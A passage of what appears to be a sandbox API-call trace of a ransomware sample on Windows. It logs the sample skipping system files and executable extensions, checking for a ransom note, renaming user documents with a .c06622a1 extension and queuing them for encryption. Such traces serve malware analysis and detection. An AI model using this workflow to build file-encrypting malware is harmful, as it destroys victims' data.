(_Str1="iconcache.db", _Str2="6z8JjAGWT6AK.odp") returned 51 [0158.301] wcslen (_String="iconcache.db") returned 0xc [0158.301] _wcsicmp (_Str1="ntldr", _Str2="6z8JjAGWT6AK.odp") returned 56 [0158.301] wcslen (_String="ntldr") returned 0x5 [0158.301] _wcsicmp (_Str1="ntuser.dat", _Str2="6z8JjAGWT6AK.odp") returned 56 [0158.302] wcslen (_String="ntuser.dat") returned 0xa [0158.302] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6z8JjAGWT6AK.odp") returned 56 [0158.302] wcslen (_String="ntuser.dat.log") returned 0xe [0158.302] _wcsicmp (_Str1="ntuser.ini", _Str2="6z8JjAGWT6AK.odp") returned 56 [0158.302] wcslen (_String="ntuser.ini") returned 0xa [0158.302] _wcsicmp (_Str1="thumbs.db", _Str2="6z8JjAGWT6AK.odp") returned 62 [0158.302] wcslen (_String="thumbs.db") returned 0x9 [0158.302] _wcsicmp (_Str1="386", _Str2="odp") returned -60 [0158.302] wcslen (_String="386") returned 0x3 [0158.302] _wcsicmp (_Str1="adv", _Str2="odp") returned -14 [0158.302] wcslen (_String="adv") returned 0x3 [0158.302] _wcsicmp (_Str1="ani", _Str2="odp") returned -14 [0158.302] wcslen (_String="ani") returned 0x3 [0158.302] _wcsicmp (_Str1="bat", _Str2="odp") returned -13 [0158.302] wcslen (_String="bat") returned 0x3 [0158.302] _wcsicmp (_Str1="bin", _Str2="odp") returned -13 [0158.302] wcslen (_String="bin") returned 0x3 [0158.302] _wcsicmp (_Str1="cab", _Str2="odp") returned -12 [0158.302] wcslen (_String="cab") returned 0x3 [0158.302] _wcsicmp (_Str1="cmd", _Str2="odp") returned -12 [0158.302] wcslen (_String="cmd") returned 0x3 [0158.302] _wcsicmp (_Str1="com", _Str2="odp") returned -12 [0158.302] wcslen (_String="com") returned 0x3 [0158.302] _wcsicmp (_Str1="cpl", _Str2="odp") returned -12 [0158.302] wcslen (_String="cpl") returned 0x3 [0158.302] _wcsicmp (_Str1="cur", _Str2="odp") returned -12 [0158.302] wcslen (_String="cur") returned 0x3 [0158.302] _wcsicmp (_Str1="deskthemepack", _Str2="odp") returned -11 [0158.302] wcslen (_String="deskthemepack") returned 0xd [0158.302] _wcsicmp (_Str1="diagcab", _Str2="odp") returned -11 [0158.302] wcslen (_String="diagcab") returned 0x7 [0158.302] _wcsicmp (_Str1="diagcfg", _Str2="odp") returned -11 [0158.302] wcslen (_String="diagcfg") returned 0x7 [0158.302] _wcsicmp (_Str1="diagpkg", _Str2="odp") returned -11 [0158.303] wcslen (_String="diagpkg") returned 0x7 [0158.303] _wcsicmp (_Str1="dll", _Str2="odp") returned -11 [0158.303] wcslen (_String="dll") returned 0x3 [0158.303] _wcsicmp (_Str1="drv", _Str2="odp") returned -11 [0158.303] wcslen (_String="drv") returned 0x3 [0158.303] _wcsicmp (_Str1="exe", _Str2="odp") returned -10 [0158.303] wcslen (_String="exe") returned 0x3 [0158.303] _wcsicmp (_Str1="hlp", _Str2="odp") returned -7 [0158.303] wcslen (_String="hlp") returned 0x3 [0158.303] _wcsicmp (_Str1="icl", _Str2="odp") returned -6 [0158.303] wcslen (_String="icl") returned 0x3 [0158.303] _wcsicmp (_Str1="icns", _Str2="odp") returned -6 [0158.303] wcslen (_String="icns") returned 0x4 [0158.303] _wcsicmp (_Str1="ico", _Str2="odp") returned -6 [0158.303] wcslen (_String="ico") returned 0x3 [0158.303] _wcsicmp (_Str1="ics", _Str2="odp") returned -6 [0158.303] wcslen (_String="ics") returned 0x3 [0158.303] _wcsicmp (_Str1="idx", _Str2="odp") returned -6 [0158.303] wcslen (_String="idx") returned 0x3 [0158.303] _wcsicmp (_Str1="ldf", _Str2="odp") returned -3 [0158.303] wcslen (_String="ldf") returned 0x3 [0158.303] _wcsicmp (_Str1="lnk", _Str2="odp") returned -3 [0158.303] wcslen (_String="lnk") returned 0x3 [0158.303] _wcsicmp (_Str1="mod", _Str2="odp") returned -2 [0158.303] wcslen (_String="mod") returned 0x3 [0158.303] _wcsicmp (_Str1="mpa", _Str2="odp") returned -2 [0158.303] wcslen (_String="mpa") returned 0x3 [0158.303] _wcsicmp (_Str1="msc", _Str2="odp") returned -2 [0158.303] wcslen (_String="msc") returned 0x3 [0158.303] _wcsicmp (_Str1="msp", _Str2="odp") returned -2 [0158.303] wcslen (_String="msp") returned 0x3 [0158.303] _wcsicmp (_Str1="msstyles", _Str2="odp") returned -2 [0158.303] wcslen (_String="msstyles") returned 0x8 [0158.303] _wcsicmp (_Str1="msu", _Str2="odp") returned -2 [0158.304] wcslen (_String="msu") returned 0x3 [0158.304] _wcsicmp (_Str1="nls", _Str2="odp") returned -1 [0158.304] wcslen (_String="nls") returned 0x3 [0158.304] _wcsicmp (_Str1="nomedia", _Str2="odp") returned -1 [0158.304] wcslen (_String="nomedia") returned 0x7 [0158.304] _wcsicmp (_Str1="ocx", _Str2="odp") returned -1 [0158.304] wcslen (_String="ocx") returned 0x3 [0158.304] _wcsicmp (_Str1="prf", _Str2="odp") returned 1 [0158.304] wcslen (_String="prf") returned 0x3 [0158.304] _wcsicmp (_Str1="ps1", _Str2="odp") returned 1 [0158.304] wcslen (_String="ps1") returned 0x3 [0158.304] _wcsicmp (_Str1="rom", _Str2="odp") returned 3 [0158.304] wcslen (_String="rom") returned 0x3 [0158.304] _wcsicmp (_Str1="rtp", _Str2="odp") returned 3 [0158.304] wcslen (_String="rtp") returned 0x3 [0158.304] _wcsicmp (_Str1="scr", _Str2="odp") returned 4 [0158.304] wcslen (_String="scr") returned 0x3 [0158.304] _wcsicmp (_Str1="shs", _Str2="odp") returned 4 [0158.304] wcslen (_String="shs") returned 0x3 [0158.304] _wcsicmp (_Str1="spl", _Str2="odp") returned 4 [0158.304] wcslen (_String="spl") returned 0x3 [0158.304] _wcsicmp (_Str1="sys", _Str2="odp") returned 4 [0158.304] wcslen (_String="sys") returned 0x3 [0158.304] _wcsicmp (_Str1="theme", _Str2="odp") returned 5 [0158.304] wcslen (_String="theme") returned 0x5 [0158.304] _wcsicmp (_Str1="themepack", _Str2="odp") returned 5 [0158.304] wcslen (_String="themepack") returned 0x9 [0158.304] _wcsicmp (_Str1="wpx", _Str2="odp") returned 8 [0158.304] wcslen (_String="wpx") returned 0x3 [0158.304] _wcsicmp (_Str1="lock", _Str2="odp") returned -3 [0158.304] wcslen (_String="lock") returned 0x4 [0158.305] _wcsicmp (_Str1="key", _Str2="odp") returned -4 [0158.305] wcslen (_String="key") returned 0x3 [0158.305] _wcsicmp (_Str1="hta", _Str2="odp") returned -7 [0158.305] wcslen (_String="hta") returned 0x3 [0158.305] _wcsicmp (_Str1="msi", _Str2="odp") returned -2 [0158.305] wcslen (_String="msi") returned 0x3 [0158.305] _wcsicmp (_Str1="pdb", _Str2="odp") returned 1 [0158.305] wcslen (_String="pdb") returned 0x3 [0158.305] _wcsicmp (_Str1="sqlite", _Str2="odp") returned 4 [0158.305] wcslen (_String="sqlite") returned 0x6 [0158.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.305] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.305] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.305] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned 0x4f [0158.305] wcscpy (in: _Dest=0x32a0130, _Source="6z8JjAGWT6AK.odp" | out: _Dest="6z8JjAGWT6AK.odp") returned="6z8JjAGWT6AK.odp" [0158.305] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp", dwFileAttributes=0x80) returned 1 [0158.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6z8jjagwt6ak.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0158.306] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.306] ReadFile (in: hFile=0x1a0, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.307] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x6b8dbf71 [0158.307] RtlComputeCrc32 (PartialCrc=0xbf71, Buffer=0x32e4a4, Length=0x80) returned 0xc457109e [0158.307] RtlComputeCrc32 (PartialCrc=0x109e, Buffer=0x32e4a4, Length=0x80) returned 0xd297c1c1 [0158.307] RtlComputeCrc32 (PartialCrc=0xc1c1, Buffer=0x32e4a4, Length=0x80) returned 0x946399ba [0158.307] RtlComputeCrc32 (PartialCrc=0x99ba, Buffer=0x32e4a4, Length=0x80) returned 0xc07bd378 [0158.307] CloseHandle (hObject=0x1a0) returned 1 [0158.307] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.307] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp" [0158.307] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp") returned 0x60 [0158.307] wcscpy (in: _Dest=0x32b0158, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.307] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6z8jjagwt6ak.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6z8jjagwt6ak.odp.c06622a1"), dwFlags=0x8) returned 1 [0158.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6z8JjAGWT6AK.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6z8jjagwt6ak.odp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0158.309] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.310] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7585a12d [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x796530c5 [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f9e0e92 [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40a75b6 [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4aa7f0d6 [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3481844d [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54156866 [0158.317] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x784d5564 [0158.320] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x4ce249b6 [0158.320] RtlComputeCrc32 (PartialCrc=0x49b6, Buffer=0x2b70094, Length=0x80) returned 0x1f3bc0b7 [0158.320] RtlComputeCrc32 (PartialCrc=0xc0b7, Buffer=0x2b70094, Length=0x80) returned 0x9bee1b21 [0158.320] RtlComputeCrc32 (PartialCrc=0x1b21, Buffer=0x2b70094, Length=0x80) returned 0x6241d54f [0158.320] RtlComputeCrc32 (PartialCrc=0xd54f, Buffer=0x2b70094, Length=0x80) returned 0xf6d6e0b2 [0158.320] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0158.320] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.320] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.320] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2c8380, ftCreationTime.dwHighDateTime=0x1d5dabd, ftLastAccessTime.dwLowDateTime=0xbf86a420, ftLastAccessTime.dwHighDateTime=0x1d5e254, ftLastWriteTime.dwLowDateTime=0xbf86a420, ftLastWriteTime.dwHighDateTime=0x1d5e254, nFileSizeHigh=0x0, nFileSizeLow=0x276e, dwReserved0=0x0, dwReserved1=0x0, cFileName="d- dbc5fvbfPF0ACEfH.docx", cAlternateFileName="D-DBC5~1.DOC")) returned 1 [0158.320] _wcsicmp (_Str1="d- dbc5fvbfPF0ACEfH.docx", _Str2="README.c06622a1.TXT") returned -14 [0158.320] wcsstr (_Str="d- dbc5fvbfPF0ACEfH.docx", _SubStr="README") returned 0x0 [0158.321] _wcsicmp (_Str1="autorun.inf", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned -3 [0158.321] wcslen (_String="autorun.inf") returned 0xb [0158.321] _wcsicmp (_Str1="boot.ini", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned -2 [0158.321] wcslen (_String="boot.ini") returned 0x8 [0158.321] _wcsicmp (_Str1="bootfont.bin", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned -2 [0158.321] wcslen (_String="bootfont.bin") returned 0xc [0158.321] _wcsicmp (_Str1="bootsect.bak", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned -2 [0158.321] wcslen (_String="bootsect.bak") returned 0xc [0158.321] _wcsicmp (_Str1="desktop.ini", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned 56 [0158.321] wcslen (_String="desktop.ini") returned 0xb [0158.321] _wcsicmp (_Str1="iconcache.db", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned 5 [0158.321] wcslen (_String="iconcache.db") returned 0xc [0158.321] _wcsicmp (_Str1="ntldr", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned 10 [0158.321] wcslen (_String="ntldr") returned 0x5 [0158.321] _wcsicmp (_Str1="ntuser.dat", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned 10 [0158.321] wcslen (_String="ntuser.dat") returned 0xa [0158.321] _wcsicmp (_Str1="ntuser.dat.log", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned 10 [0158.321] wcslen (_String="ntuser.dat.log") returned 0xe [0158.321] _wcsicmp (_Str1="ntuser.ini", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned 10 [0158.321] wcslen (_String="ntuser.ini") returned 0xa [0158.321] _wcsicmp (_Str1="thumbs.db", _Str2="d- dbc5fvbfPF0ACEfH.docx") returned 16 [0158.321] wcslen (_String="thumbs.db") returned 0x9 [0158.321] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0158.321] wcslen (_String="386") returned 0x3 [0158.321] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0158.321] wcslen (_String="adv") returned 0x3 [0158.321] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0158.321] wcslen (_String="ani") returned 0x3 [0158.321] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0158.321] wcslen (_String="bat") returned 0x3 [0158.321] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0158.321] wcslen (_String="bin") returned 0x3 [0158.321] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0158.322] wcslen (_String="cab") returned 0x3 [0158.322] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0158.322] wcslen (_String="cmd") returned 0x3 [0158.322] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0158.322] wcslen (_String="com") returned 0x3 [0158.322] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0158.322] wcslen (_String="cpl") returned 0x3 [0158.322] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0158.322] wcslen (_String="cur") returned 0x3 [0158.322] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0158.322] wcslen (_String="deskthemepack") returned 0xd [0158.322] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0158.322] wcslen (_String="diagcab") returned 0x7 [0158.322] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0158.322] wcslen (_String="diagcfg") returned 0x7 [0158.322] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0158.322] wcslen (_String="diagpkg") returned 0x7 [0158.322] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0158.322] wcslen (_String="dll") returned 0x3 [0158.322] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0158.322] wcslen (_String="drv") returned 0x3 [0158.322] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0158.322] wcslen (_String="exe") returned 0x3 [0158.322] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0158.322] wcslen (_String="hlp") returned 0x3 [0158.322] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0158.322] wcslen (_String="icl") returned 0x3 [0158.322] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0158.322] wcslen (_String="icns") returned 0x4 [0158.322] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0158.322] wcslen (_String="ico") returned 0x3 [0158.322] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0158.322] wcslen (_String="ics") returned 0x3 [0158.322] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0158.323] wcslen (_String="idx") returned 0x3 [0158.323] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0158.323] wcslen (_String="ldf") returned 0x3 [0158.323] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0158.323] wcslen (_String="lnk") returned 0x3 [0158.323] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0158.323] wcslen (_String="mod") returned 0x3 [0158.323] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0158.323] wcslen (_String="mpa") returned 0x3 [0158.323] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0158.323] wcslen (_String="msc") returned 0x3 [0158.323] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0158.323] wcslen (_String="msp") returned 0x3 [0158.323] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0158.323] wcslen (_String="msstyles") returned 0x8 [0158.323] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0158.323] wcslen (_String="msu") returned 0x3 [0158.323] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0158.323] wcslen (_String="nls") returned 0x3 [0158.323] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0158.323] wcslen (_String="nomedia") returned 0x7 [0158.323] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0158.323] wcslen (_String="ocx") returned 0x3 [0158.323] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0158.323] wcslen (_String="prf") returned 0x3 [0158.323] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0158.323] wcslen (_String="ps1") returned 0x3 [0158.323] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0158.323] wcslen (_String="rom") returned 0x3 [0158.323] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0158.323] wcslen (_String="rtp") returned 0x3 [0158.323] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0158.323] wcslen (_String="scr") returned 0x3 [0158.323] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0158.323] wcslen (_String="shs") returned 0x3 [0158.324] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0158.324] wcslen (_String="spl") returned 0x3 [0158.324] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0158.324] wcslen (_String="sys") returned 0x3 [0158.324] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0158.324] wcslen (_String="theme") returned 0x5 [0158.324] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0158.324] wcslen (_String="themepack") returned 0x9 [0158.324] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0158.324] wcslen (_String="wpx") returned 0x3 [0158.324] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0158.324] wcslen (_String="lock") returned 0x4 [0158.324] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0158.324] wcslen (_String="key") returned 0x3 [0158.324] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0158.324] wcslen (_String="hta") returned 0x3 [0158.324] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0158.324] wcslen (_String="msi") returned 0x3 [0158.324] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0158.324] wcslen (_String="pdb") returned 0x3 [0158.324] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0158.324] wcslen (_String="sqlite") returned 0x6 [0158.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.324] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.324] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.324] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned 0x4f [0158.324] wcscpy (in: _Dest=0x32a0130, _Source="d- dbc5fvbfPF0ACEfH.docx" | out: _Dest="d- dbc5fvbfPF0ACEfH.docx") returned="d- dbc5fvbfPF0ACEfH.docx" [0158.324] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx", dwFileAttributes=0x80) returned 1 [0158.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\d- dbc5fvbfpf0acefh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.325] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.325] ReadFile (in: hFile=0x1cc, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.326] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x60c13531 [0158.326] RtlComputeCrc32 (PartialCrc=0x3531, Buffer=0x32e4a4, Length=0x80) returned 0x44950659 [0158.326] RtlComputeCrc32 (PartialCrc=0x659, Buffer=0x32e4a4, Length=0x80) returned 0xbff44789 [0158.326] RtlComputeCrc32 (PartialCrc=0x4789, Buffer=0x32e4a4, Length=0x80) returned 0x3b06ea60 [0158.326] RtlComputeCrc32 (PartialCrc=0xea60, Buffer=0x32e4a4, Length=0x80) returned 0x33d0e65d [0158.326] CloseHandle (hObject=0x1cc) returned 1 [0158.326] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.326] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx" [0158.326] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx") returned 0x68 [0158.326] wcscpy (in: _Dest=0x32b0168, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.326] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\d- dbc5fvbfpf0acefh.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\d- dbc5fvbfpf0acefh.docx.c06622a1"), dwFlags=0x8) returned 1 [0158.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\d- dbc5fvbfPF0ACEfH.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js 